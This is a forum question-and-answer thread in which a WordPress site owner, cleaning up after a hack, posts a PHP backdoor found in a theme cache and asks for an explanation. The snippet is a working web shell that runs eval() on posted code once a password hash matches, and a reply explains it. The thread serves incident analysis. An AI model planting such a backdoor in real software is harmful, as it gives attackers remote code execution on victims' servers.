Solved

Decrypt Malicious inserterted PHP

Posted on 2011-09-27
2
408 Views
Last Modified: 2012-05-12
I had a client's WordPress website hacked last week because of a leaky thumb.php. Cleaned up the website and replaced the leaky thumb.php. A PHP file was added to the theme's cached:
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}

Open in new window


I need someone to explain this code to me, Did find: http://wordpress.org/support/topic/new-hack-attempt-on-self-hosted-wordpress-site but no precise explanation was given

PS The malicious code consequently added to a WP core file I have not added here
0
Comment
Question by:rhandalthor
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
2 Comments
 
LVL 70

Accepted Solution

by:
Jason C. Levine earned 500 total points
ID: 36714634
If a specially crafted post is sent to the site with a variable of "key" defined, line 1 evaluates and turns into a command that lines 2 and 3 execute.  

I assume it does something less than optimal :)
0
 

Author Comment

by:rhandalthor
ID: 36714679
Yeah. Hadn't worked with $_POST for a while and certainly not this way. Well, think all is cleaned up and fortified again.. Thanks Jason.
0

Featured Post

PeopleSoft Has Never Been Easier

PeopleSoft Adoption Made Smooth & Simple!

On-The-Job Training Is made Intuitive & Easy With WalkMe's On-Screen Guidance Tool.  Claim Your Free WalkMe Account Now

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article discusses how to implement server side field validation and display customized error messages to the client.
When it comes to security, close monitoring is a must. According to WhiteHat Security annual report, a substantial number of all web applications are vulnerable always. Monitis offers a new product - fully-featured Website security monitoring and pr…
The purpose of this video is to demonstrate how to reset a WordPress password if you are locked out and cannot reset the password. A typical use would be if you cannot access the email to which WordPress would send the password recovery email to…
The purpose of this video is to demonstrate how to add AdSense Ads to a WordPress Website, and how to set up WordPress to automatically place Ads in Sidebars. This will be demonstrated using a Windows 8 PC. Log into your AdSense account. : Cli…

734 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question